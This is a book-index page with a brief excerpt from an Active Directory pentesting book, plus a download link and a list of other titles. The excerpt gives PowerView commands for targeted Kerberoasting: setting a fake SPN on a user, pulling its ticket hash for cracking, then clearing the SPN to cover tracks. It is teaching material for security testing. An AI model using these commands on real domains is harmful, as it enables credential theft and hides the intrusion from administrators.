Pentesting Active Directory and Windows-based Infrastructure by Denis Isakov
Author:Denis Isakov
Language: eng
Format: epub, pdf
Publisher: Packt Publishing Pvt Ltd
Published: 2023-10-26T00:00:00+00:00
Figure 6.14 â jaime.lannister has WriteProperty over lord.varys
Our first attack will be targeted Kerberoasting. The idea is to set the SPN on the user, obtain the Kerberoast hash, and clear out the SPN to cover our tracks. This can be achieved with the following PowerView commands:
Set-DomainObject -Identity 'lord.varys' -Set @{serviceprincipalname='notexist/ROAST'} Get-DomainUser 'lord.varys' | Get-DomainSPNTicket | fl Set-DomainObject -Identity 'lord.varys' -Clear ServicePrincipalName
The result of the preceding commands is shown in the screenshot:
Download
Pentesting Active Directory and Windows-based Infrastructure by Denis Isakov.pdf
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.
Sass and Compass in Action by Wynn Netherland Nathan Weizenbaum Chris Eppstein Brandon Mathis(7658)
Grails in Action by Glen Smith Peter Ledbrook(7572)
Configuring Windows Server Hybrid Advanced Services Exam Ref AZ-801 by Chris Gill(5863)
Azure Containers Explained by Wesley Haakman & Richard Hooper(5826)
Running Windows Containers on AWS by Marcio Morales(5344)
Kotlin in Action by Dmitry Jemerov(4921)
Microsoft 365 Identity and Services Exam Guide MS-100 by Aaron Guilmette(4521)
Management Strategies for the Cloud Revolution: How Cloud Computing Is Transforming Business and Why You Can't Afford to Be Left Behind by Charles Babcock(4324)
Combating Crime on the Dark Web by Nearchos Nearchou(4079)
The Age of Surveillance Capitalism by Shoshana Zuboff(3797)
The Ruby Workshop by Akshat Paul Peter Philips Dániel Szabó and Cheyne Wallace(3742)
Microsoft Cybersecurity Architect Exam Ref SC-100 by Dwayne Natwick(3596)
Learn Windows PowerShell in a Month of Lunches by Don Jones(3410)
Python for Security and Networking - Third Edition by José Manuel Ortega(3321)
Mastering Python for Networking and Security by José Manuel Ortega(3227)
Mastering Azure Security by Mustafa Toroman and Tom Janetscheck(3227)
Blockchain Basics by Daniel Drescher(3189)
The Ultimate Docker Container Book by Schenker Gabriel N.;(2992)
TCP IP by Todd Lammle(2875)
